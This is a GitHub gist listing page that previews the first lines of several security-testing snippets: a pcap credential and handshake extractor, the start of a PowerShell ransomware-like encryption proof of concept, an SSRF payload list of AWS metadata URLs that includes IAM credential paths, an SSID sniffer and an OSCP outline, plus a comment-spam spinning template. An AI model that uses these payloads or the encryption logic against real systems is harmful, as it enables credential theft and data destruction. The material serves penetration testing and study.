Skip to content

Instantly share code, notes, and snippets.

View pmsosa's full-sized avatar
🌊
Good Vibes

Pedro M. Sosa pmsosa

🌊
Good Vibes
92 followers · 24 following
View GitHub Profile
@r4ulcl
r4ulcl / pcapFilter.sh
Last active June 2, 2025 03:41
Ttshark filter script to get WPA-EAP Identities, EAP certs, HTTP passwords, Handshakes, DNS queries, NBTNS queries and LLMNR queries. Reading a file or a folder
#!/bin/bash
#author : Raul Calvo Laorden ([email protected])
#description : Script to get WPA-EAP Identities, EAP certs, HTTP passwords, Handshakes, DNS queries, NBTNS queries and LLMNR queries
#date : 2021-06-24
#usage : bash pcapFilter.sh -f <pcap/folder> [options]
#-----------------------------------------------------------------------------------------------------------
red=`tput setaf 1`
green=`tput setaf 2`
@2XXE-SRA
2XXE-SRA / coolcryptor.ps1
Last active September 29, 2020 22:36
poc crypto ransomware like script. encrypts all files in given directory
function Invoke-AESEncryptDirectory
{
param(
[string]$directory,
[string]$extension
)
$csharp = @"
//https://stackoverflow.com/questions/27645527/aes-encryption-on-large-files
using System;
@cablethief
cablethief / extract_EAP.sh
Last active September 25, 2024 02:04 — forked from singe/create_certs.sh
A simple tshark EAP certificate extractor
#!/bin/sh
# Simple tshark WiFi EAP certificate extractor
# By [email protected]
# All rights reserved 2018
if [ ! -x $(which tshark) ]; then
echo "tshark not installed"
exit 0
fi
@jhaddix
jhaddix / cloud_metadata.txt
Last active December 14, 2025 18:24 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@MaskRay
MaskRay / fft_ntt_bench.cc
Last active May 20, 2017 20:41
FFT & NTT benchmark
#include <algorithm>
#include <cassert>
#include <chrono>
#include <cmath>
#include <complex>
#include <cstdint>
#include <cstdlib>
#include <iostream>
#include <numeric>
#include <string>
@unfo
unfo / how-to-oscp-final.md
Last active October 11, 2025 18:26

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@JustinMcNamara74
JustinMcNamara74 / UserPermissions.sql
Last active January 30, 2025 15:46
#MSSQL List all user permissions/roles for all users
/*
********************************************************************************************************************************
Credits: @Jeremy
Posted: http://stackoverflow.com/questions/7048839/sql-server-query-to-find-all-permissions-access-for-all-users-in-a-database
********************************************************************************************************************************
Security Audit Report
1) List all access provisioned to a sql user or windows user/group directly
2) List all access provisioned to a sql user or windows user/group through a database or application role
3) List all access provisioned to the public role
@shanselman
shanselman / gist:5422230
Last active September 30, 2025 08:47
Evil Blog Comment Spammer just exposed his template through some error and the whole thing showed up in my comments.
{
{I have|I've} been {surfing|browsing} online more than {three|3|2|4} hours today, yet I never found any interesting article like yours. {It's|It
is} pretty worth enough for me. {In my opinion|Personally|In my view}, if all {webmasters|site owners|website owners|web owners} and bloggers made good content as
you did, the {internet|net|web} will be {much more|a lot more}
useful than ever before.|
I {couldn't|could not} {resist|refrain from} commenting. {Very well|Perfectly|Well|Exceptionally well} written!|
{I will|I'll} {right away|immediately} {take hold of|grab|clutch|grasp|seize|snatch}
your {rss|rss feed} as I {can not|can't} {in finding|find|to find} your {email|e-mail} subscription {link|hyperlink} or {newsletter|e-newsletter} service. Do {you have|you've} any?
{Please|Kindly} {allow|permit|let} me {realize|recognize|understand|recognise|know} {so that|in order that} I {may just|may|could} subscribe.
Thanks.|
@securitytube
securitytube / ssid-sniffer-scapy-python.py
Created April 2, 2013 12:49
WLAN SSID Sniffer in Python using Scapy
#!/usr/bin/env python
from scapy.all import *
ap_list = []
def PacketHandler(pkt) :
if pkt.haslayer(Dot11) :
if pkt.type == 0 and pkt.subtype == 8 :
@UniIsland
UniIsland / SimpleHTTPServerWithUpload.py
Created August 14, 2012 04:01
Simple Python Http Server with Upload
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""